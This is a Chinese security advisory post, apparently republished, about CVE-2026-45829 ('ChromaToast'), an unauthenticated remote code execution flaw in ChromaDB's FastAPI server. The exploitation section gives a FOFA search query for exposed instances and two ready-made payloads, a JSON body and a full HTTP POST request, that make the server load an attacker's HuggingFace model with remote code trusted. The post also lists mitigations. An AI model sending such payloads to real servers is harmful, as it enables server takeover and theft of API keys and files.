2026-05-24 05:09:22 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： ChromaDB开源向量数据库存在CVSS10.0严重漏洞CVE-2026-45829，未授权攻击者可通过特制POST请求在鉴权前触发HuggingFace模型加载执行任意代码，影响1.0.0至1.5.8版本。漏洞根因为模型标识符未校验与鉴权顺序缺陷，利用载荷可完全接管服务器。临时缓解建议包括限制网络访问、使用Rust前端替代。 综合评分： 85 文章分类： 漏洞分析,漏洞预警,WEB安全,云安全,解决方案

cover_image

CVSS 10.0 【严重】CVE-2026-45829 ChromaDB 爆出未授权 RCE：ChromaToast 横扫 AI 基础设施

原创

chicken chicken

爱坤sec

2026年5月23日 02:30 重庆

在小说阅读器读本章

去阅读

一漏洞描述

ChromaDB 开源向量数据库 Python FastAPI 服务器存在严重设计缺陷——**未授权攻击者可在鉴权之前触发 HuggingFace 模型加载并执行任意代码**。该漏洞由 HiddenLayer 发现并命名为 ChromaToast，获得 CVSS 10.0 满分评分。利用无需任何凭据，仅需向 /api/v2/tenants/{tenant}/databases/{db}/collections 端点发送特制请求，即可完全接管服务器，窃取 API 密钥、环境变量及磁盘文件。

CVSS 评分 10.0

二影响版本

Chromadb&nbsp;>=&nbsp;1.0.0&nbsp;（截至最新版&nbsp;1.5.8&nbsp;仍未修复）

三搜索语法

app="Chroma-ChromaDB"

四影响范围

资产大约4500个

五漏洞利用

**【根因】**&nbsp;两个独立缺陷叠加：1. 服务器无条件信任客户端提交的模型标识符（`model_name`），未做任何校验2. 模型加载在**鉴权之前**执行，鉴权检查形同虚设**【调用链】**&nbsp;`POST&nbsp;/api/v2/tenants/{tenant}/databases/{db}/collections`&nbsp;→&nbsp;解析请求体中的 `kwargs`&nbsp;→&nbsp;提取 `model_name`&nbsp;+&nbsp;`trust_remote_code:&nbsp;true`&nbsp;→&nbsp;调用 `AutoModel.from_pretrained()`&nbsp;→&nbsp;从&nbsp;HuggingFace&nbsp;下载恶意模型&nbsp;→&nbsp;**执行远程代码**&nbsp;→&nbsp;返回&nbsp;HTTP&nbsp;500（已无意义）```python# 核心攻击载荷{&nbsp;&nbsp;"name":&nbsp;"exploit_collection",&nbsp;&nbsp;"metadata": {},&nbsp;&nbsp;"configuration": {&nbsp; &nbsp;&nbsp;"embedding_function":&nbsp;"HuggingFaceEmbeddingFunction",&nbsp; &nbsp;&nbsp;"model_name":&nbsp;"attacker/malicious-model",&nbsp; &nbsp;&nbsp;"kwargs": {&nbsp; &nbsp; &nbsp;&nbsp;"trust_remote_code":&nbsp;true&nbsp; &nbsp; }&nbsp; }}```服务端处理流程：**接受请求&nbsp;→&nbsp;下载模型&nbsp;→&nbsp;执行代码&nbsp;→&nbsp;鉴权检查&nbsp;→&nbsp;拒绝请求**。攻击者已在第&nbsp;3&nbsp;步获得&nbsp;Shell。**【EXP&nbsp;存放位置】**&nbsp;服务器本地目录 `/opt/aikunsec/CVE-2026-45829/exploit.py````POST&nbsp;/api/v2/tenants/default_tenant/databases/default_database/collections HTTP/1.1Host: target:8000Content-Type: application/json{&nbsp;&nbsp;"name":&nbsp;"pwn",&nbsp;&nbsp;"configuration": {&nbsp; &nbsp;&nbsp;"embedding_function":&nbsp;"HuggingFaceEmbeddingFunction",&nbsp; &nbsp;&nbsp;"model_name":&nbsp;"your-hf-username/pwn-model",&nbsp; &nbsp;&nbsp;"kwargs": {"trust_remote_code":&nbsp;true}&nbsp; }}```HiddenLayer&nbsp;于&nbsp;2026&nbsp;年&nbsp;2&nbsp;月&nbsp;17&nbsp;日向&nbsp;ChromaDB&nbsp;报告，独立研究员&nbsp;Azraelxuemo&nbsp;更早在&nbsp;2025&nbsp;年&nbsp;11&nbsp;月报告，均未获回应。截至&nbsp;ChromaDB&nbsp;1.5.8&nbsp;**仍未修复**。

临时缓解：限制网络访问、禁止暴露 Python FastAPI 端口到公网、使用 Rust 前端替代。

【严重声明】本文所涉及的工具、思路和操作手法仅用于本地安全测试以及教育目的，禁止将其用于非法入侵或对他人的系统进行攻击以及盈利，一切后果由操作者自行承担！！！下载后的24小时请删除。

更多精彩文章与工具分享欢迎关注

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：爱坤sec chicken chicken《CVSS 10.0 【严重】CVE-2026-45829 ChromaDB 爆出未授权 RCE：ChromaToast 横扫 AI 基础设施》